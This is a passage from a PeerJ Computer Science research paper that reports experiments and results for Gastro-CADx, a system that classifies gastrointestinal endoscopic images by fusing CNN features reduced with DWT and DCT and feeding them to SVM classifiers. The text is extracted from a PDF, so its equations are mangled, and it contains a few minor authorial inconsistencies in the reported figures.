http://dx.doi.org/10.7717/peerj-cs.423 https://peerj.com/computer-science/ small deviations (details). Whereas, low frequencies are associated with the brightness conditions. On the other hand, middle frequencies coefficients comprise valuable information and build the basic assembly of the image. The dimension of the DCT coefficient matrix is identical to the input DL featue (Dabbaghchian, Ghaemmaghami & Aghagolzadeh, 2010).Feature reduction Feature reduction is an important procedure that is commonly used in the medical field to lower the huge dimension of the feature space. This reduction will correspondingly lead to a reduction in the complexity of the classification procedure (Ragab & Attallah, 2020), the training time of the model, and avoid overfitting (Attallah et al., 2017a; 2017b). For this reason, DWT and DCT have been employed as feature reduction procedures as well as feature extractors instead of directly using the large dimension of DL features generated in the previous step. Therefore, a 1-level of DWT is applied to each DL features. The coefficients generated are are the approximation coefficients CA1, and detail coefficients CD1 of the first decomposition level of DWT. These coefficients have half the dimension of the original DL feature dimension which enters the DWT process. By this way the dimension of feature space is reduced. The CA and CD coefficients are used separately to train the SVM classifiers of the next step of Gastro-CADx. The DCT, on its own, does not reduce the data dimension; however, it shrinks most of the image information in a small number of coefficients (Dabbaghchian, Ghaemmaghami & Aghagolzadeh, 2010). Another reduction stage is usually executed to reduce the data dimension, where some of the coefficients are chosen to develop feature vectors. In this article, 500 DCT coefficients are generated using the zigzag procedure. After this reduction procedure, these coefficients are used separately to train the SVM classifiers of the next step of Gastro-CADx. Feature fusion (Third stage of gastro-CADx) The feature vectors generated for each of the DCT and DWT coefficients are then fuzed in a concatenated manner to form different combinations of fuzed features sets which are then used to classify the SVM classifiers in the next step of Gastro-CADx. For DWT, initially, the CA coefficients extracted from the DL features for every two networks are fuzed. Then, the CA coefficients extracted from the DL features of every three networks are fuzed. Next, all CA coefficients extracted from DL features of the four networks are merged. The same procedure is done for the CD coefficients. For the DCT, firstly the coefficients extracted from the DL features for every two networks are fuzed. Then, the coefficients extracted from the DL features of every three networks are fuzed. Finally, the DCT coefficients extracted from DL features of the four CNNs are merged Classification step In this step, the classification procedure is performed using two scenarios either by an end-to-end DL (Attallah, Ragab & Sharkas, 2020), techniques or by using the features extracted from the three stages of Gastro-CADx. The scenarios resemble four experiments. The first scenario represents the use of the four CNNs including AlexNet, ResNet-50, DarkNet-19, and DenseNet-201 as classifiers (end to end DL process). Each pre-trained Attallah and Sharkas (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.423 13/36 http://dx.doi.org/10.7717/peerj-cs.423 https://peerj.com/computer-science/ CNN is created and learned distinctly and then used as a classifier. The first scenario represents experiment I. In the second scenario, the first stage of Gastro-CADx is executed which corresponds to experiment II, where the pre-trained CNNs are applied to images, and then the DL features are extracted from each network individually. These DL features are used to learn distinct SVM classifiers. These features represent spatial information only and of a huge dimension. Therefore, in the second stage of Gastro-CADx which corresponds to experiment III, the DWT and the DCT feature extraction methods are applied to DL features generated from each CNN of the first stage of Gastro-CADx to extract temporal-frequency and spatial-frequency information. These features are utilized to train SVM classifiers individually. The problem of dimensionality reduction is considered as well in the second stage of Gastro-CADx, where a reduced set of coefficients are generated using the DWT and DCT methods. These coefficients represent feature vectors that are used separately to learn three SVM classifiers. Finally, in the third stage of Gastro-CADx, the reduced features are fuzed to form different combinations of fuzed features. These different combinations are used to construct several distinct SVM classifiers The aim of this stage is to examine the influence of feature fusion on the classification accuracy and select the combination which has the highest impact on the performance of the Gastro-CADx. This stage corresponds to experiment IV. Figure 4 summarizes the four experiments of Gastro-CADx. Note that the SVM classifier was chosen as it is known to be a powerful classifier. It is considered to be one of the best methods in pattern classification and image classification (Thai, Hai & Thuy, 2012). It performs well with large dimension space and of multi-class Figure 4 A summary of the four experiments of Gastro-CADx. Full-size DOI: 10.7717/peerj-cs.423/fig-4 Attallah and Sharkas (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.423 14/36 http://dx.doi.org/10.7717/peerj-cs.423/fig-4 http://dx.doi.org/10.7717/peerj-cs.423 https://peerj.com/computer-science/ problems. As it uses kernel function which maps the feature space into new domain that can easily separate between classes of a dataset. Therefore, it is commonly used with the huge dimension of DL features extracted from CNNs (Ragab et al., 2019; Jadoon et al., 2017; Zhang et al., 2020; Das et al., 2020; Xue et al., 2016; Leng et al., 2016; Wu et al., 2018; Sampaio et al., 2011) achieving outperforming results. Also, as you can see in Table 1, that SVM is the commonly used in the literature It can be observed that articles that used SVM achieved the highest performance as Khan et al. (2020b) which achieved an accuracy of 99.13%, (Khan et al., 2020a) achieving an accuracy of 98.4%, (Ghatwary, Ye & Zolgharni, 2019) obtaining an accuracy of 95%, (Billah, Waheed & Rahman, 2017) achieving an accuracy of 98.65% EXPERIMENTAL SETUP Several parameters are attuned after fine-tuning the fc layer of the CNNs. The number of epochs and the initial learning rate for the four CNNs are 10 and 10−4 respectively as in (Attallah, Sharkas & Gadelkarim, 2020). The mini-batch size and validation frequency are 10 and 3. The weight decay and momentum are set to 5 × 10−4 and 0.9 respectively. The optimization algorithm used is the Stochastic Gradient Descent with Momentum (SGDM). To measure the capacity of the Gastro-CADx to classify several GI diseases, 5-fold cross-validation is engaged. This means that the GI datasets are divided into 80–20% for training and validation. The SVM classifiers are taught with 4 folds and verified by the remaining fold. Thus, the models are taught five times and the testing accuracy is calculated for each time then averaged. The kernel functions used for the SVM classifier are linear, quadratic, and cubic. EVALUATION PERFORMANCE The presented Gastro-CADx framework is evaluated with numerous measures for instance; F1-score, precision, accuracy, sensitivity, and specificity. The formulas which are utilized in calculating such metrics are displayed below in Eqs. (1)–(5) (Attallah, Ragab & Sharkas, 2020). Accuracy ¼ TP þ TN TN þ FP þ FN þ TP (1) Sensitivity ¼ TP TP þ FN (2) Specificity ¼ TN TN þ FP (3) Precision ¼ TP TP þ FP (4) F1 � Score ¼ 2 � TP 2 � TPð Þ þ FP þ FN (5) where; is the total sum of GI images that are well classified to the GI class which they actually belongs to is known as TP, TN is the sum of GI images that do not belong to the GI Attallah and Sharkas (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.423 15/36 http://dx.doi.org/10.7717/peerj-cs.423 https://peerj.com/computer-science/ class intended to be classified, and truly do not belong to. For each class of GI, FP is the sum of all images that are classified as this GI class but they do not truly belong to. For each class of GI, FN is the entire sum of GI images that are not classified as this GI class. RESULTS The results of four experiments of Gastro-CADx are presented in this section. Experiment I is an end to end DL process where the four CNN are employed to perform classification. In experiment II (first stage of Gastro-CADx), DL features are extracted from the four CNNs and used to train distinct SVM classifiers. Experiment III (second stage of Gastro-CADx) represents the use of the second stage of feature extraction and reduction methods which employs DCT and DWT to extract temporal-frequency and spatial-frequency information from the images. In this experiment, reduced coefficients generated from DWT and DCT methods are employed to train SVM classifiers. In experiment IV, different combinations of fuzed features are generated and utilized to inspect the effect of feature combination on Gastro-CADx performance. Experiment I results The results of the end-to-end DL procedure employed for classification are illustrated in Tables 3 and 4 for Dataset I and Dataset II respectively. Table 3 shows that the highest accuracy of 91.66% is achieved by ResNet-50 followed by an accuracy of 90.08%, 89.83%, 88.32% attained by DarkNet-19, DenseNet-201, and AlexNet respectively for Dataset I. Table 4 demonstrates that the peak accuracy of 94.75% is achieved by ResNet-50 followed by an accuracy of 93.26%, 91.93%,91.66% attained by DarkNet-19, DenseNet-201, and AlexNet respectively for Dataset II. Experiment II results This experiment represents the first stage of Gastro-CADx. The results of this experiment are shown in Figs. 5 and 6 for Dataset I and Dataset II respectively. Figure 5 indicates the Table 3 The classification accuracy for the four CNNs used in Gastro-CADx using Dataset I. CNN Accuracy (%) AlexNet 88.32 ResNet-50 91.66 DarkNet-19 90.08 DenseNet-201 89.83 Table 4 The classification accuracy for the four CNNs used in Gastro-CADx using Dataset II. CNN Accuracy (%) AlexNet 91.66 ResNet-50 94.75 DarkNet-19 93.26 DenseNet-201 91.93 Attallah and Sharkas (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.423 16/36 http://dx.doi.org/10.7717/peerj-cs.423 https://peerj.com/computer-science/ maximum accuracies of 94.4% and 94.3% are attained by DarkNet-19 using linear and quadratic SVM classifiers using Dataset I. Subsequently, ResNet-50 features achieve an accuracy of 93.5%, 93.4%, and 93.4% using linear, quadratic, and cubic SVM classifiers respectively. Following, AlexNet and DenseNet-201 features obtain an accuracy of 92.9%, 93%, 92.7%, and 91%, 91.5%, 91.7% for using linear, quadratic, and cubic SVM classifiers respectively. Figure 6 shows the peak accuracies of 96.9%, 96.8%, 96.7% are achieved by ResNet-50 using linear, quadratic, and cubic SVM classifiers constructed with Dataset II. Next, DarkNet features attain an accuracy of 96.4%, 96%, and 95.2% using linear, quadratic, and cubic SVM classifiers respectively. Following, AlexNet and DenseNet-201 features obtain an accuracy of 95.5%, 95.7%, 95.3% and 94.7%, 94.6%, 94.6% for using linear, quadratic, and cubic SVM classifiers respectively. Experiment III results This experiment represents the second stage of Gastro-CADx. The results of this experiment are shown in Figs. 7–10 for Dataset I and Figs. 11–14 for Dataset II. Figure 7 shows the classification accuracy for the three SVM classifiers constructed with CA and CD coefficients of DWT, besides the 500 DCT coefficients extracted from the ResNet-50 CNN using Dataset I. The figure indicates that the peak accuracy of 93.6% is achieved using the 500 DCT coefficients with linear SVM. Almost the same accuracy of 93.5% is attained using the CA coefficients of DWT. Figure 8 demonstrates the classification accuracy for the three SVM classifiers built with CA and CD coefficients of DWT, in addition to the 500 DCT coefficients extracted from AlexNet CNN using Dataset I. The figure specifies that the highest accuracy of 93.3% is accomplished using the CD coefficients of DWT with a quadratic SVM classifier. A slightly lower accuracy of 92.9% is attained using the CA coefficients of DWT. Figure 5 Experiment II—Accuracy of each DL features extracted from the four CNNs of Gastro- CADx constructed using Dataset I. Full-size DOI: 10.7717/peerj-cs.423/fig-5 Attallah and Sharkas (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.423 17/36 http://dx.doi.org/10.7717/peerj-cs.423/fig-5 http://dx.doi.org/10.7717/peerj-cs.423 https://peerj.com/computer-science/ Figure 9 displays the classification accuracy for the three SVM classifiers constructed with CA and CD coefficients of DWT, as well as the 500, DCT coefficients extracted from DenseNet CNN using Dataset I. The figure identifies that the highest accuracy of 91.1% is accomplished using the CA coefficients of DWT with a cubic SVM classifier. A lower accuracy of 90.6% is reached using the CA coefficients of DWT with a linear SVM classifier. Figure 6 Experiment II—Accuracy of each DL features extracted from the four CNNs of Gastro- CADx constructed using Dataset II. Full-size DOI: 10.7717/peerj-cs.423/fig-6 Figure 7 Experiment III—Accuracy of each DCT and DWT features extracted from the ResNet-50 CNN of Gastro-CADx constructed using Dataset I. Full-size DOI: 10.7717/peerj-cs.423/fig-7 Attallah and Sharkas (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.423 18/36 http://dx.doi.org/10.7717/peerj-cs.423/fig-6 http://dx.doi.org/10.7717/peerj-cs.423/fig-7 http://dx.doi.org/10.7717/peerj-cs.423 https://peerj.com/computer-science/ Figure 10 shows the classification accuracy for the three SVM classifiers created with the CA and CD coefficients of DWT, besides the DCT coefficients extracted from DarkNet-19 CNN using Dataset I. Note that, since the number of DL features extracted from DarkNet-19 was only 8 (which is already a small dimension of features), all the DCT coefficients are used in this experiment without the need of the zigzag scanning procedure. The figure indicates that the highest accuracy of 94.7% is accomplished using the DCT coefficients with linear SVM. Figure 8 Experiment III—Accuracy of each DCT and DWT features extracted from the AlexNet CNN of Gastro-CADx constructed using Dataset I. Full-size DOI: 10.7717/peerj-cs.423/fig-8 Figure 9 Experiment III—Accuracy of each DCT and DWT features extracted from the DenseNet- 201 CNN of Gastro-CADx constructed using Dataset I. Full-size DOI: 10.7717/peerj-cs.423/fig-9 Attallah and Sharkas (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.423 19/36 http://dx.doi.org/10.7717/peerj-cs.423/fig-8 http://dx.doi.org/10.7717/peerj-cs.423/fig-9 http://dx.doi.org/10.7717/peerj-cs.423 https://peerj.com/computer-science/ Figure 11 shows the classification accuracy for the three SVM classifiers constructed with CA and CD coefficients of DWT, besides the 500 DCT coefficients extracted from the ResNet-50 CNN using Dataset II. The figure indicates that the peak accuracy of 96.9% is achieved using the CA coefficients with linear, cubic, and quadratic SVM. Almost the same accuracy of 96.8% is attained using the CD coefficients of DWT with linear, cubic, and quadratic SVM and the 500 DCT coefficient with linear SVM. Figure 10 Experiment III—Accuracy of each DCT and DWT features extracted from the DarkNet CNN of Gastro-CADx constructed using Dataset I. Full-size DOI: 10.7717/peerj-cs.423/fig-10 Figure 11 Experiment III—Accuracy of each DCT and DWT features extracted from the ResNet-50 CNN of Gastro-CADx constructed using Dataset II. Full-size DOI: 10.7717/peerj-cs.423/fig-11 Attallah and Sharkas (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.423 20/36 http://dx.doi.org/10.7717/peerj-cs.423/fig-10 http://dx.doi.org/10.7717/peerj-cs.423/fig-11 http://dx.doi.org/10.7717/peerj-cs.423 https://peerj.com/computer-science/ Figure 12 reveals the classification accuracy for the three SVM classifiers learned with CA and CD coefficients of DWT, besides the 500 DCT coefficients extracted from AlexNet CNN using Dataset II. The figure specifies that the highest accuracy of 95.6% is accomplished using the CA coefficients of DWT with a quadratic SVM classifier. A slightly lower accuracy of 95.5% is attained using the CD coefficients of DWT with quadratic SVM. Figure 13 indicates the classification accuracy for the three SVM classifiers built with CA and CD coefficients of DWT, besides the 500, DCT coefficients extracted from Figure 12 Experiment III—Accuracy of each DCT and DWT features extracted from the AlexNet CNN of Gastro-CADx constructed using Dataset II. Full-size DOI: 10.7717/peerj-cs.423/fig-12 Figure 13 Experiment III—Accuracy of each DCT and DWT features extracted from the DenseNet- 201 CNN of Gastro-CADx constructed using Dataset II.Full-size DOI: 10.7717/peerj-cs.423/fig-13 Attallah and Sharkas (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.423 21/36 http://dx.doi.org/10.7717/peerj-cs.423/fig-12 http://dx.doi.org/10.7717/peerj-cs.423/fig-13 http://dx.doi.org/10.7717/peerj-cs.423 https://peerj.com/computer-science/ DenseNet CNN using Dataset II. The figure identifies that the highest accuracy of 94.4% is accomplished using the CA coefficients of DWT with cubic and quadratic SVM classifiers. The same accuracy is reached using the CD coefficients of DWT with a quadratic SVM classifier. Figure 14 demonstrates the classification accuracy for the three SVM classifiers constructed with CA and CD coefficients of DWT, in addition to the DCT coefficients extracted from DarkNet-19 CNN using Dataset II. As the number of DL features mined from DarkNet-19 was only 10 in the case of Dataset II (which is already a small dimension of features), all the DCT coefficients are employed in this experiment without the necessity of the zigzag scanning process. The figure specifies that the peak accuracy of 96.4% is obtained using the DCT coefficients with linear SVM. Experiment IV results This experiment represents the third stage of Gastro-CADx. This experiment aims to explore the effect of combining features on the CADx’s performance. Moreover, to search for the best combination of fuzed feature set which has the highest influence on the classification accuracy. To form the fuzed feature sets, firstly for DWT, the CD coefficients extracted from the DL features for every two CNNs are fuzed. Next, the CD coefficients extracted from the DL features of each three CNNs are merged. Afterward, all CD coefficients extracted from the DL features of the four CNNs are combined. A similar fusion process is executed for the CA coefficients. For DCT, initially, the coefficients extracted from the DL features for every two CNNs are fuzed. Afterward, the DCT coefficients extracted from the DL featured of each three CNNs are fuzed. Next, the coefficients extracted from DL images of the four CNNs are merged. Figure 14 Experiment III—Accuracy of each DCT and DWT features extracted from the DarkNet-19 CNN of Gastro-CADx constructed using Dataset II. Full-size DOI: 10.7717/peerj-cs.423/fig-14 Attallah and Sharkas (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.423 22/36 http://dx.doi.org/10.7717/peerj-cs.423/fig-14 http://dx.doi.org/10.7717/peerj-cs.423 https://peerj.com/computer-science/ Table 5 displays a comparison between classification accuracy achieved using CA and CD features extracted from different combinations of the DL features generated from the four CNNs employed in Gastro-CADx using Dataset I. This comparison shows the CA features has slightly higher accuracy than CD features for all combination of fuzed features except for AlexNet+ResNet and AlexNet+DenseNet. The maximum performance (written in bold) is achieved using CA and CD features extracted using the fusion of AlexNet+ResNet+DenseNet CNNs, where the highest accuracy of 97.3% is attained using CA features extracted using AlexNet+ResNet+DenseNet CNNs with both quadratic and cubic SVM. On the other hand, Table 6 presents a comparison between classification accuracy accomplished using 500 DCT features extracted from different combinations of the DL variables produced from the four CNNs employed in Gastro-CADx using Dataset I. Table 5 The classification accuracy (%) for the CA and CD features of DWT extracted from different combination of CNNs used in Gastro-CADx using Dataset I. Features CA CD Linear Quadratic Cubic Linear Quadratic Cubic ResNet+DarkNet 94.8 95 95 93.8 94 93.7 AlexNet+DarkNet 93.7 94.5 94.6 93.4 93.7 93.4 DenseNet+DarkNet 48.8 48.5 47.6 48.4 48.6 47.7 AlexNet+ResNet 94.2 94.4 94.1 94.3 94.7 94.5 AlexNet+DenseNet 95.7 96 96.2 95.8 96.2 96 ResNet+DenseNet 96.1 96.3 96.6 96.4 96.5 96.7 AlexNet+ResNet+DenseNet 96.8 97.3 97.3 96.5 96.8 96.8 AlexNet+ResNet+DarkNet 95.2 95.3 95.4 94.4 94.7 94.7 AlexNet+DenseNet+DarkNet 95.6 95.9 96.2 95.9 96.4 96.3 ResNet+DenseNet+DarkNet 96.3 96.7 96.7 96.3 96.4 96.5 AlexNet+ResNet+DenseNet+DarkNet 96.6 96.8 97 96.3 96.6 96.6 Table 6 The classification accuracy (%) for the 500 DCT features extracted from different combination of CNNs used in Gastro-CADx using Dataset I. Features Linear Quadratic Cubic ResNet+DarkNet 95 95 95.3 AlexNet+DarkNet 95 95 95.1 DenseNet+DarkNet 47.7 47.5 46.6 AlexNet+ResNet 94.2 94.2 94.4 AlexNet+DenseNet 95.5 95.7 96.1 ResNet+DenseNet 96.2 96.2 96.3 AlexNet+ResNet+DarkNet 95.5 95.8 95.9 AlexNet+ DenseNet +DarkNet 95.8 95.9 96 ResNet +DenseNet+DarkNet 96.3 96.5 96.5 AlexNet+ResNet+DenseNet 96.8 97 97.1 AlexNet+ResNet+DenseNet+DarkNet 97.1 97.3 97.3 Attallah and Sharkas (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.423 23/36 http://dx.doi.org/10.7717/peerj-cs.423 https://peerj.com/computer-science/ This comparison indicates the maximum performance (written in bold) is achieved using DCT features extracted using AlexNet+ResNet+DenseNet+DarkNet CNNs, where the highest accuracy of 97.3% is attained using features extracted using AlexNet+ResNet +DenseNet+DarkNet CNNs with both quadratic and cubic SVM. Table 7 demonstrates a comparison between the classification accuracy accomplished using CA and CD features extracted from different combinations of the DL variables produced from the four CNNs using Dataset II. This comparison indicates the CA features has slightly higher accuracy than CD features for all combinations of fuzed features except for AlexNet+ResNet and AlexNet+DenseNet. The peak performance (written in bold) is achieved using CA and CD features extracted using AlexNet+ResNet+DenseNet CNNs, where the maximum accuracy of 99.7% is reached using CA features extracted using AlexNet+ResNet+DenseNet CNNs using cubic SVM. In contrast, Table 8 shows a comparison between classification accuracy accomplished using 500 DCT features extracted from different combinations of the DL variables generated from the four CNNs employed in Gastro-CADx using Dataset II. This comparison specifies the maximum accuracy (written in bold) is achieved using 500 DCT features extracted using AlexNet +ResNet+DenseNet CNNs and AlexNet+ ResNet+DenseNet+DarkNet CNNs, where the highest accuracy of 97.3% is attained using linear, quadratic, and cubic SVM classifiers. Table 9 shows the performance metrics for cubic SVM classifiers trained with the fuzed CA features extracted from AlexNet+ResNet+DenseNet CNNs using Dataset I and Dataset II. The results of Table 9 indicate that the specificity of 0.9959 and 0.9996, sensitivity of 0.9715 and 0.9965, precision of 0.9718 and 0.9961, and F1 score of 0.9715 and 0.9963 are obtained for Dataset I and Dataset II respectively Table 7 The classification accuracy (%) for the CA and CD features of DWT extracted from different combination of CNNs used in Gastro-CADx using Dataset II. Features CA CD Linear Quadratic Cubic Linear Quadratic Cubic ResNet+DarkNet 98.6 98.6 98.6 98.4 98.6 98.6 AlexNet+DarkNet 98.6 98.7 98.9 98.1 98.6 98.7 DenseNet+DarkNet 97.1 97.3 97.3 96.5 96.7 96.7 AlexNet+ResNet 98.7 99 99 98.6 98.9 99 AlexNet+DenseNet 97.7 98 98.1 97.7 98 98.1 ResNet+DenseNet 48.8 49 49.2 48.7 49 49.1 AlexNet+ResNet +DenseNet 99.6 99.6 99.7 99.5 99.6 99.5 AlexNet+ResNet+DarkNet 98.8 98.8 98.9 98.8 98.9 98.9 AlexNet+DenseNet+DarkNet 98.7 98.7 98.8 98.6 98.8 98.8 ResNet+DenseNet+DarkNet 98.8 98.9 99 98.7 99 99.1 AlexNet+ResNet+DenseNet+DarkNet 99.6 99.6 99.6 99.4 99.5 99.6 Attallah and Sharkas (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.423 24/36 http://dx.doi.org/10.7717/peerj-cs.423 https://peerj.com/computer-science/ DISCUSSION The manual diagnosis of GI diseases with a huge number of endoscopic images is very challenging and time-consuming. Besides, at times the image containing the abnormality can be simply unobserved by the medical expert which can lead to misdiagnosis. Therefore, there is an essential need for automatic systems that have the capability to automatically identify possible anomalies by analyzing the entire endoscopic images (Aoki et al., 2019). Nowadays, with the current development of DL and imaging processing technologies, CADx systems have been frequently used to help gastroenterologists in automatically examining endoscopic images and recognizing the GI disease (Khan et al., 2020b). In this study, an automatic CADx system called Gastro-CADx is proposed. The proposed CADx involves three steps including the image preprocessing step, followed by the feature extraction, reduction, and fusion step, and finally the classification step. Primary the endoscopic images were augmented. Next, is the feature extraction, reduction, and fusion step. Which presents the three stages of Gastro-CADx. In the first stage of Gastro-CADx, four spatial valuable DL features were extracted from the four CNNs and used to train SVM classifiers. Next, in the second stage of Gastro-CADx, DCT, and DWT feature extraction methods were employed to extract temporal-frequency and spatial-frequency features. These methods were used for feature reduction as well. These extracted features are utilized Table 8 The Classification Accuracy (%) for the 500 DCT features extracted from different combination of CNNs used in Gastro-CADx using Dataset II. Features Linear Quadratic Cubic ResNet+DarkNet 98.1 98.4 98.5 AlexNet+DarkNet 97.7 97.9 98 DenseNet+DarkNet 48.7 49 49.2 AlexNet+ResNet 98.2 98.5 98.6 AlexNet+DenseNet 98.2 98.6 98.6 ResNet +DenseNet 98.8 98.9 98.9 AlexNet+ResNet+DarkNet 98.8 99 99.2 AlexNet+DenseNet+DarkNet 98.6 98.7 98.7 ResNet +DenseNet+DarkNet 98.6 98.9 98.9 AlexNet+ResNet +DenseNet 99.6 99.6 99.6 AlexNet+ResNet +DenseNet+DarkNet 98.7 99.5 99.6 Table 9 The Performance metrics for the CA features of DWT extracted from AlexNet+ResNet +DenseNet CNNs using Dataset I and II. Specificity Sensitivity Precision F1 score Dataset I Cubic SVM 0.9959 0.9715 0.9718 0.9715 Dataset II Cubic SVM 0.9996 0.9965 0.9961 0.9963 Attallah and Sharkas (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.423 25/36 http://dx.doi.org/10.7717/peerj-cs.423 https://peerj.com/computer-science/ to construct the SVM classifiers. Finally, in the third stage of Gastro-CADx, the coefficients of the DCT and DWT were fuzed to form different combinations of fuzed feature sets. This stage examined the influence of fuzing features on the performance of the CADx. Besides, the third stage of Gastro-CADx searched for the greatest mixture of features that influenced Gastro-CADx’s performance. Two datasets, namely Dataset I and Dataset II were used to evaluate the performance of the proposed Gastro-CADx. The first stage of Gastro-CADx is compared with the end-to-end DL CNNs of experiment I and the results are shown in Tables 10 for Dataset I and II. It can be observed from Table 10 that the first stage of Gastro-CADx has higher accuracies compared to the end-to-end CNNs constructed in experiment I for both datasets. The highest accuracy achieved in the first stage of Gastro-CADx is 94.4% using linear SVM trained with DarkNet-19 features for Dataset I (written in bold). Whereas, for Dataset II, the peak accuracy attained in the first stage of Gastro-CADx is 96.9% using linear SVM trained with DarkNet-19 features. It was found that most of the previous studies directly used spatial DL features to perform the classification, however in the article we tried extracting spatial-temporal- frequency DL features using DWT and spatial-frequency DL features using DCT to examine their influence on the classification performance of Gastro-CADx (stage two of Gastro-CADx). DCT and DCT was also performed to reduce the huge dimension of the DL spatial features. It is proved from Fig. 15, that for dataset I, stage two has enhanced the classification performance with reduced feature set, while for dataset II it attained the same accuracy but with lower feature dimension. The second stage of Gastro-CADx has reduced the features extracted from the first stage of Gastro-CADx with almost the same accuracy but with fewer feature dimensional space for Dataset I and Dataset II. The highest accuracy of 94.7% of the second stage of Gastro-CADx for Dataset I was obtained using linear SVM classifier trained with the DCT coefficients extracted from deep learning features of DarkNet-19 CNN. Whereas, for Dataset II, the peak accuracy of 96.9% Table 10 The classification Accuracy (%) for the first stage of Gastro-CADx compared to Experiment I (end-to-end classifiction process) using Dataset I and II. CNN Experiment I (END to END) First Stage of Gastro-CADx Linear Quadratic Cubic DataSet I AlexNet 88.32 92.9 93 92.7 ResNet-50 91.66 93.5 93.4 93.4 DarkNet-19 90.08 94.4 94.3 92.2 DenseNet-201 89.83 91 91.5 91.7 DataSet II AlexNet 91.66 95.5 95.7 95.3 ResNet-50 94.75 96.9 96.8 96.7 DarkNet-19 93.26 96.4 96 95.2 DenseNet-201 91.93 94.7 94.6 94.6 Attallah and Sharkas (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.423 26/36 http://dx.doi.org/10.7717/peerj-cs.423 https://peerj.com/computer-science/ is achieved using linear SVM classifier trained with the CA coefficients extracted from deep learning features of ResNet-50 CNN. On the other hand, the third stage of Gastro-CADx has further enhancement on the classification accuracy of Gastro-CADx as shown in Fig. 15 for Dataset I and Dataset II. Figure 15 shows the highest classification accuracy achieved using each stage of Gastro-CADx for Dataset I and II respectively. It can be noticed from the third stage of Gastro-CADx (experiment IV) that the fusion of DCT and DWT of DarkNet and DenseNet CNNs yielded the worst accuracy of around 47–49% for both Dataset I and Dataset II. Whereas, the highest accuracy of 97.3% and 99.7% is achieved using cubic SVM classifier trained with the fuzed CA coefficients extracted using deep learning features of AlexNet+ResNet+DesneNet for Dataset I and Dataset II respectively. In order to make a fair comparison regarding the computational time with other related studies, we both should use the same platform and environment like using the same processor and video controller and other specifications which can vary the computational time. Since, this is very hard to be accomplished as an alternative, we compared the computational cost of the proposed Gastro-CADx with ResNet CNN (end-to-end deep learning techniques) which is widely used in the literature and achieved the highest accuracy using both Dataset I and Dataset II as shown in Table 10. This comparison is shown in Table 11 which compares both the classification accuracy and training time of ResNet CNN using end-to-end procedure with Gastro-CADx. Table 11 proves that Gastro-CADx has much lower computation time than ResNet (end-end classification) while attaining higher accuracy for both datasets. This is because the computation time for ResNet is 80,580 s and 100,800 s for Dataset I and II respectively which is much higher than the 210 s and 780 s achieved by Gastro-CADx. Also, the accuracy for ResNet is 90.08% and 94.75% for Figure 15 A comparison between the highest accuracy attained from the three stage of Gasto-CADx using Dataset I and II. Full-size DOI: 10.7717/peerj-cs.423/fig-15 Attallah and Sharkas (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.423 27/36 http://dx.doi.org/10.7717/peerj-cs.423/fig-15 http://dx.doi.org/10.7717/peerj-cs.423 https://peerj.com/computer-science/ Dataset I and II respectively which is much higher than the 97.3% and 99.7% obtained by Gastro-CADx Note that we also searched related studies to see if the authors have mentioned the computational time of their proposed methods, but unfortunately this information was missing. All experiments are done with Matlab 2020a. The processor used is Intel(R) Core(TM) i7-7700HQ, CPU @ 2.80 GHz 2.8 GHz, RAM 16 GB, and 64-bit operating system. The video controller is NVIDIA GeForce GTX 1050. A comparison is made to compare the performance of Gastro-CAD with the latest relevant work that used Dataset I. The results of this assessment are displayed in Table 12. Table 12 results prove the competence of Gastro-CADx compared to other previous related studies. Gastro-CADx proposed in this article appears to perform well on all of the metrics provided in Table 12. Gastro-CADx outperformed the systems presented by Ahmad et al. (2017), Pogorelov et al. (2017) (first method), Owais et al. (2019), as they used only spatial information extracted and from one or two CNN. The proposed system also outperformed (Pogorelov et al., 2017; Nadeem et al., 2018) as they used only handcrafted global features and did not benefit from using the spatial information of features extracted with DL techniques. Although, Agrawal et al. (2017) combined DL features with handcrafted global features, yet their performance is lower than Table 11 Computation time and accuracy acheived using Gastro-CADx compared to ResNet end-to- end deep learning method. Method Dataset I Dataset II Training time (s) Accuracy (%) Training time (s) Accuracy (%) ResNet (end-to end) 80,580 90.08 100,800 94.75 Gastro-CADx 210 97.3 780 99.7 Table 12 Comparisons with recent related studies based on Dataset I. Article Method Performance metrics Accuracy (%) Sensitivity Precision Specificity F1 score Ahmad et al. (2017) AlexNet 75.4 – – – – Agrawal et al. (2017) GF1+Inception V3+VGG+SVM 96.1 0.852 0.847 0.978 0.827 Pogorelov et al. (2017) ResNet+LMT2 95.7 0.826 0.829 0.975 0.802 Pogorelov et al. (2017) GF+Decision Tree 93.7 0.748 0.748 0.964 0.747 Pogorelov et al. (2017) GF+Random Forest 93.3 0.732 0.732 0.962 0.727 Nadeem et al. (2018) GF+LBP3+Haralick+LR4 94.2 0.774 0.767 0.966 0.707 Thambawita et al. (2018) GF+CNN 95.8 0.958 0.9587 0.9971 0.9580 Owais et al. (2019) ResNet+DenseNet+MLP5 92.5 0.993 0.946 – 0.934 Gastro-CADx 97.3 0.9715 0.9718 0.9959 0.9715 Notes: 1 Global features. 2 Logistic model tree. 3 Local binary pattern. 4 Logistic regression. 5 Multilayer perceptron. Attallah and Sharkas (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.423 28/36 http://dx.doi.org/10.7717/peerj-cs.423 https://peerj.com/computer-science/ Gastro-CADx. This is because Gastro-CADx considered the fusion of two types of textural features while reducing the feature space. Dataset II is a new dataset for GI disease that was just released in 2020. Therefore, there is still no research articles to compare with. For this reason, we only compared with the ResNet-50 CNN used in Borgli et al. (2020) as well as the other three CNNs employed in experiment I of Gastro-CADx and illustrated in Table 13. The results of Gasto-CADx shown in Table 12 verifies its competence. It outperformed the classification accuracy achieved by ResNet-50 used in Borgli et al. (2020). Gastro-CADx has also better performance than the classification accuracy achieved by AlexNet, DenseNet-201, and DarkNet-19 CNNs. This is because Gastro-CADx extracted not only spatial features but temporal-frequency and spatial-frequency 